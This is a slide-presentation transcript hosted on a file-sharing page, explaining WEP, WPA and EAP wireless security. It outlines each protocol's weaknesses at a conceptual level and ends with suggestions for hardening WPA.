Wep wpa and eap
1 / 20

WEP, WPA, and EAP - PowerPoint PPT Presentation

  • Uploaded on

WEP, WPA, and EAP. Drew Kalina. Overview. Wired Equivalent Privacy (WEP) Wi-Fi Protected Access (WPA) Extensible Authentication Protocol (EAP). WEP. Encryption method: RC4 Key size: 40 bits Hash method: ICV 802.11x authentication: optional Key distribution: manual.

I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
Download Presentation

PowerPoint Slideshow about ' WEP, WPA, and EAP' - willa-poole

An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.

- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
Wep wpa and eap


Drew Kalina


  • Wired Equivalent Privacy (WEP)

  • Wi-Fi Protected Access (WPA)

  • Extensible Authentication Protocol (EAP)


  • Encryption method: RC4

  • Key size: 40 bits

  • Hash method: ICV

  • 802.11x authentication: optional

  • Key distribution: manual

Wep vulnerabilities
WEP Vulnerabilities

  • ICV insecure –

    • based on CRC32 (bad)

    • ICV can be modified to match message contents

  • IV key reuse attack

    • Small IV allows this

    • IV sent as plaintext

Wep vulnerabilities cont
WEP Vulnerabilities (cont)

  • Known plaintext attack

    • Lots of unencrypted TCP/IP traffic

    • Send pings from internet to access point

    • String length N can be recovered for a given IV

    • Packets of size N can be forged using IV

Wep vulnerabilities cont1
WEP Vulnerabilities (cont)

  • Partial Known Plaintext

    • Only a portion of message is known (e.g. IP header)

    • Can recover M octets of key stream where M<N

    • Extend then known key stream from M to N through probing

    • Divert packets to attacker by flipping CRC32 bits

Wep vulnerabilities cont2
WEP Vulnerabilities (cont)

  • Authentication forging

    • Use recovered key stream and IV because client specifies IV

  • Dictionary attacks

    • Key derived from vulnerable password

  • Realtime decryption

    • Dictionary of IVs and keystreams

    • Only 2^24 possibilities

    • Can be stored in 24GB disk space

Wep summary
WEP summary

  • Weak encryption with other problems

  • If possible, use some other protocol

  • Still better than plaintext


  • Encryption method: RC4, TKIP

  • Key size: 128 bits (varies)

  • Hash method: ICV, Michael

  • 802.11x authentication: can be required

  • Key distribution: TKIP

Wpa cont
WPA (cont)

  • Michael generates MIC (Message Integrity Code)

    • 8 bits

    • Placed between data and ICV

  • TKIP (Temporal Key Integral Protocol)

    • Resolves keys to be used, looks at client’s configuration

    • Changes encryption key every frame

    • Sets unique default key for each client

Wpa vulnerabilities
WPA Vulnerabilities

  • Birthday attack

    • Get a pair D,M where D1 = MIC(M1)

    • When Di = D1 where Di != 1, attack is successful

    • Probability for success: 2^32

    • If keys change during attack, forgery is garbage

Wpa vulnerabilities cont
WPA Vulnerabilities (cont)

  • Differential cryptanalytic attack

    • Michael results have special characteristics

    • M = Mi XOR Mj and D = Di XOR Dj called characteristic differentials

    • After characteristic differentials obtained, try to find MIC (learn parts of the key)

    • Probability of success 2^30

    • Optimal attack exists with O(2^29)

Wpa vulnerabilities cont1
WPA Vulnerabilities (cont)

  • Temporal Key

    • Lost RC4 Keys

    • Can discover TK and MIC

    • Can forge messages

    • Not a practical attack, O(2^105)

    • Does show susceptibility in parts of WPA

Wpa vulnerabilities cont2
WPA Vulnerabilities (cont)

  • DOS

    • Access point shuts down for 60 seconds if forged unauthorized data detected

    • Possible to shut access points with little network activity

  • PSK

    • Used in absence of 802.1x, 1 per ESS (usually).

    • Internal person can use this, and a captured MAC address/nonce to imitate another client

    • Vulnerable to external dictionary attacks, if short

Wpa summary
WPA summary

  • Much better than WEP (if 802.1x)

  • WEP2 even better using AES-CCMP

  • There are still vulnerabilities

  • Many WEP devices are upgradeable to WPA (not WPA2)

Suggestions for wpa
Suggestions for WPA

  • Rekey security associations after failures

  • Lower/eliminate timeouts after detecting forged packets

    • Currently would take 1000+ years to break with 60 second timeouts


  • Transmission method and framework for authentication protocols

  • Works with many authen. protocols such as RADIUS, Kerberos.

  • Uses a variety of transport methods

Eap transport methods
EAP Transport methods



  • PEAP (Protected EAP)

  • LEAP (Light EAP)

Vulnerabilities in leap
Vulnerabilities in LEAP

  • Dictionary attack

  • Early versions of MS-CHAP weak